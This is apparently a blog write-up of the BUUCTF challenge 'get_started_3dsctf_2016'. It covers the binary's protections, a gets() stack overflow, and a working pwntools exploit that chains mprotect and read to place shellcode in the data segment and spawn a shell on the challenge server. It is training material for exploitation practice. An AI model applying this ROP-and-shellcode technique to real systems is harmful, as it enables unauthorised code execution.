get started 3dsctf 2016

2023-11-21 16:21

|

645

|

0

179 字

|

3 分钟

get started 3dsctf 2016

前提

查看文件保护

[*] '/root/pwn/buuctf/get_started_3dsctf_2016/get_started_3dsctf_2016'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

静态分析

主函数如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [esp+4h] [ebp-38h]

  printf("Qual a palavrinha magica? ", v4);
  gets(&v4);
  return 0;
}

思路分析

目前信息：
- 明显的栈溢出漏洞
- No PIE
- 程序开启了NX保护
- 函数表内有mprotect函数
补充：
- 在Linux中，mprotect函数可以用来修改一段指定内存区域的保护属性，函数原型如下

int mprotect(const void *start, size_t len, int prot);
// start 为mprotect函数的第一个参数 (被修改内存的地址) 常用.got.plt/.bss起始地址
// len   为mprotect函数的第二个参数 (被修改内存的大小) 通过程序启动时查看该内存块的大小得到
// prot  为mprotect函数的第三个参数 (被修改内存的权限) 7 = 4 + 2 +1 (rwx)

思路:
- 本题存在mprotect函数，且无PIE保护，选择栈溢出到mprotect处修改权限，在数据段直接写入shellcode并返回执行

exp

from pwn import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/get_started_3dsctf_2016/get_started_3dsctf_2016'
# io = process(pwnfile)
io = remote('node4.buuoj.cn', 27774)
elf = ELF(pwnfile)
padding = 52+4
mprotect_addr = elf.symbols[b'mprotect']
read_addr = elf.symbols[b'read']
data_start = 0x80EA000
pop_3times_ret = 0x804f460
lenth = 0x2000
rwx = 7
payload = flat(['a'*padding, mprotect_addr, pop_3times_ret, data_start,lenth, rwx, read_addr, data_start, 0, data_start, 0x200])
io.sendline(payload)
payload = asm(shellcraft.sh())
io.sendline(payload)
io.interactive()

Buuctf Pwn StackOverflow

暂无评论

发送评论编辑评论

悄悄话

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!